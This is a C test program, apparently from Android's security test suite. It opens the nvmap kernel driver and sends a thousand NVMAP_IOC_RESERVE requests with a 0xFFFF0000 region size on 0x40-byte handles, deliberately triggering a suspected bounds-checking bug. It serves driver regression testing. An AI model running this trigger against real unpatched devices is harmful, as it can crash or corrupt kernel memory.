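/*
 * Copyright (C) 2017 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/*
 * Test program for the nvmap character device (/dev/nvmap).
 *
 * Sequence performed by main():
 *   1. open /dev/nvmap;
 *   2. create MAX_HANDLE_NUM handles of 0x40 bytes each (NVMAP_IOC_CREATE);
 *   3. request an allocation for every handle from
 *      NVMAP_HEAP_CARVEOUT_GENERIC (NVMAP_IOC_ALLOC);
 *   4. submit, MAX_HANDLE_NUM times, one NVMAP_IOC_RESERVE request that
 *      lists every handle with offset 0 and a region size of 0xFFFF0000.
 *
 * NOTE(review): the region size in step 4 is far larger than the 0x40-byte
 * handles created in step 2. Presumably that mismatch is the malformed input
 * this test exists to send, and a driver that validates offset + size against
 * the handle size should fail the ioctl with an error -- confirm against the
 * driver fix this test accompanies (the file does not name a bug id).
 *
 * Every ioctl wrapper prints errno after the call; errno is cleared first so
 * the printed value belongs to that call and not to an earlier failure.
 */
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdint.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <dirent.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <dlfcn.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <linux/types.h>   /* __u32 / __u64 / __s32 used by the ioctl structs */


/* Argument of NVMAP_IOC_PARAM (not used by this program). */
struct nvmap_handle_param {
    __u32 handle;          /* nvmap handle */
    __u32 param;           /* size/align/base/heap etc. */
    unsigned long result;  /* returns requested info */
};

/* Argument of NVMAP_IOC_CREATE / NVMAP_IOC_GET_ID / NVMAP_IOC_GET_FD. */
struct nvmap_create_handle {
    union {
        __u32 id;    /* FromId */
        __u32 size;  /* CreateHandle */
        __s32 fd;    /* DmaBufFd or FromFd */
    };
    __u32 handle;    /* returns nvmap handle */
};

/* Argument of NVMAP_IOC_ALLOC. */
struct nvmap_alloc_handle {
    __u32 handle;     /* nvmap handle */
    __u32 heap_mask;  /* heaps to allocate from */
    __u32 flags;      /* wb/wc/uc/iwb etc. */
    __u32 align;      /* min alignment necessary */
};

/* Argument of NVMAP_IOC_RESERVE: three parallel user-space arrays of nr entries. */
struct nvmap_cache_op_list {
    __u64 handles;  /* Ptr to u32 type array, holding handles */
    __u64 offsets;  /* Ptr to u32 type array, holding offsets
                     * into handle mem */
    __u64 sizes;    /* Ptr to u32 type array, holding sizes of memory
                     * regions within each handle */
    __u32 nr;       /* Number of handles */
    __s32 op;       /* wb/wb_inv/inv */
};

#define NVMAP_IOC_MAGIC 'N'
#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
#define NVMAP_IOC_PARAM   _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
#define NVMAP_IOC_GET_ID  _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
#define NVMAP_IOC_GET_FD  _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
#define NVMAP_IOC_FREE    _IO(NVMAP_IOC_MAGIC, 4)
#define NVMAP_IOC_ALLOC   _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
#define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18, struct nvmap_cache_op_list)

/* common carveout heaps */
#define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)
#define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
#define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)

/*
 * NVMAP_HEAP_IOVMM is not defined anywhere in this file, so this macro cannot
 * be expanded as it stands; it is kept only because nothing here uses it.
 */
#define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)

/* allocation flags */
#define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
#define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
#define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
#define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)

#define NVMAP_HANDLE_SECURE          (0x1ul << 2)
#define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
#define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
#define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
#define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)

/* Values for nvmap_cache_op_list.op when used with NVMAP_IOC_RESERVE. */
enum {
    NVMAP_PAGES_UNRESERVE = 0,
    NVMAP_PAGES_RESERVE
};

/* File descriptor of /dev/nvmap; -1 until open_driver() succeeds. */
int g_fd = -1;

/* Not referenced anywhere in this file. */
static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;

/* ioctl argument buffers, filled in by prepare_data(). */
struct nvmap_create_handle* g_allocation = NULL;
struct nvmap_alloc_handle g_real_alloc = {0};
struct nvmap_cache_op_list g_op_list = {0};

#define MAX_HANDLE_NUM (1000)

/*
 * Handle tables. The "{-1}" initializer only sets element 0; the remaining
 * elements start at 0, so prepare_data() fills both tables with -1 explicitly.
 * g_handles_for_free is not used by this program.
 */
int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};

/*
 * Open /dev/nvmap read/write and store the descriptor in g_fd.
 *
 * Returns the descriptor, or a negative value when open() failed.
 */
int open_driver(void)
{
    const char *dev_path = "/dev/nvmap";

    g_fd = open(dev_path, O_RDWR);
    if (g_fd < 0) {
        printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
    } else {
        printf("[*] open file(%s) succ!\n", dev_path);
    }
    return g_fd;
}

/*
 * Issue NVMAP_IOC_CREATE with the shared g_allocation argument.
 *
 * Returns the handle the driver wrote back, or -1 when the driver wrote
 * nothing (the field is preset to -1) or prepare_data() has not run yet.
 */
int trigger_nvmap_create(void)
{
    if (g_allocation == NULL) {
        /* prepare_data() was not called; there is no argument buffer to pass. */
        return -1;
    }

    g_allocation->handle = (__u32)-1;
    errno = 0;  /* make the printed errno belong to this ioctl */
    ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
    printf("[*] NVMAP_IOC_CREATE, last error = %d\n", errno);
    return (int)g_allocation->handle;
}

/*
 * Issue NVMAP_IOC_ALLOC for one handle, using the heap, flags and alignment
 * that prepare_data() stored in g_real_alloc.
 */
void trigger_nvmap_alloc(int handle)
{
    g_real_alloc.handle = (__u32)handle;
    errno = 0;  /* make the printed errno belong to this ioctl */
    ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
    printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);
}

/* Issue NVMAP_IOC_FREE for one handle (not called by main()). */
void trigger_nvmap_free(int handle)
{
    errno = 0;  /* make the printed errno belong to this ioctl */
    ioctl(g_fd, NVMAP_IOC_FREE, handle);
    printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
}

/*
 * Set the calling thread's scheduling priority and CPU affinity
 * (not called by main()).
 *
 * privi    - nice value passed to setpriority().
 * cpu_mask - bit mask of allowed CPUs, passed to sched_setaffinity().
 */
void setup_privi_and_affinity(int privi, unsigned long cpu_mask)
{
    /* setpriority() reports failure only through errno, so clear it first. */
    errno = 0;
    setpriority(PRIO_PROCESS, gettid(), privi);
    printf("[*] setpriority(%d) errno = %d\n", privi, errno);

    /* bind process to a CPU */
    if (sched_setaffinity(gettid(), sizeof(cpu_mask),
                          (const cpu_set_t *)&cpu_mask) < 0) {
        printf("[*] sched_setaffinity(%ld) errno = %d\n", (long)cpu_mask, errno);
    }
}

/*
 * Allocate and fill the ioctl argument buffers:
 *   - g_allocation: create request for a 0x40-byte handle;
 *   - g_real_alloc: generic carveout heap, zeroed pages, 0x40 alignment;
 *   - g_op_list:    MAX_HANDLE_NUM entries, offset 0, size 0xFFFF0000 each,
 *                   operation NVMAP_PAGES_RESERVE.
 *
 * Terminates the process if any buffer cannot be allocated, because every
 * later step dereferences these buffers.
 */
void prepare_data(void)
{
    struct nvmap_create_handle *create_arg = calloc(1, 0x1000);
    __u32 *offsets = calloc(MAX_HANDLE_NUM, sizeof(*offsets));
    __u32 *sizes = malloc(MAX_HANDLE_NUM * sizeof(*sizes));
    int i;

    if (create_arg == NULL || offsets == NULL || sizes == NULL) {
        printf("[*] prepare_data: out of memory\n");
        free(create_arg);
        free(offsets);
        free(sizes);
        exit(EXIT_FAILURE);
    }

    /* Give every table slot the same "no handle" value (see the tables above). */
    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
        g_handles_for_free[i] = -1;
        g_handles_for_alloc[i] = -1;
    }

    g_allocation = create_arg;
    g_allocation->size = 0x40;

    g_real_alloc.align = 0x40;
    g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
    g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;

    /*
     * Each region is declared as 0xFFFF0000 bytes at offset 0, although the
     * handles are created with size 0x40 above.
     * NOTE(review): presumably this out-of-range size is the input under
     * test; a driver that bounds-checks the list should reject it.
     */
    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
        sizes[i] = 0xFFFF0000u;
    }

    /* Go through uintptr_t so the pointer-to-u64 conversion is well defined. */
    g_op_list.handles = (__u64)(uintptr_t)&g_handles_for_alloc[0];
    g_op_list.offsets = (__u64)(uintptr_t)offsets;
    g_op_list.sizes = (__u64)(uintptr_t)sizes;
    g_op_list.nr = MAX_HANDLE_NUM;
    g_op_list.op = NVMAP_PAGES_RESERVE;
}

/* Release the buffers allocated by prepare_data(). */
static void release_data(void)
{
    free((void *)(uintptr_t)g_op_list.sizes);
    free((void *)(uintptr_t)g_op_list.offsets);
    free(g_allocation);
    g_op_list.sizes = 0;
    g_op_list.offsets = 0;
    g_allocation = NULL;
}

/* Create MAX_HANDLE_NUM handles and record them in g_handles_for_alloc. */
void create_handles(void)
{
    int i;

    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
        g_handles_for_alloc[i] = trigger_nvmap_create();
    }
}

/*
 * Issue NVMAP_IOC_RESERVE with the whole g_op_list.
 *
 * The handle parameter is not used: every call submits the complete list of
 * MAX_HANDLE_NUM handles prepared by prepare_data().
 */
void trigger_rw_handle(int handle)
{
    (void)handle;

    errno = 0;  /* make the printed errno belong to this ioctl */
    ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list);
    printf("[*] NVMAP_IOC_RESERVE errno = %d\n", errno);
}

/*
 * Run the create / alloc / reserve sequence described in the file header.
 *
 * Returns 0 after the sequence ran, -1 when /dev/nvmap could not be opened.
 * The per-call errno lines on stdout are the only result reported.
 */
int main(int argc, char **argv)
{
    int i;

    (void)argc;
    (void)argv;

    if (open_driver() < 0) {
        return -1;
    }

    prepare_data();
    create_handles();

    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
        trigger_nvmap_alloc(g_handles_for_alloc[i]);
    }

    printf("[*] Begin to trigger bug....\n");
    sleep(1);

    /* The argument is ignored; this submits the same full list each time. */
    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
        trigger_rw_handle(g_handles_for_alloc[i]);
    }

    release_data();
    close(g_fd);
    g_fd = -1;

    return 0;
}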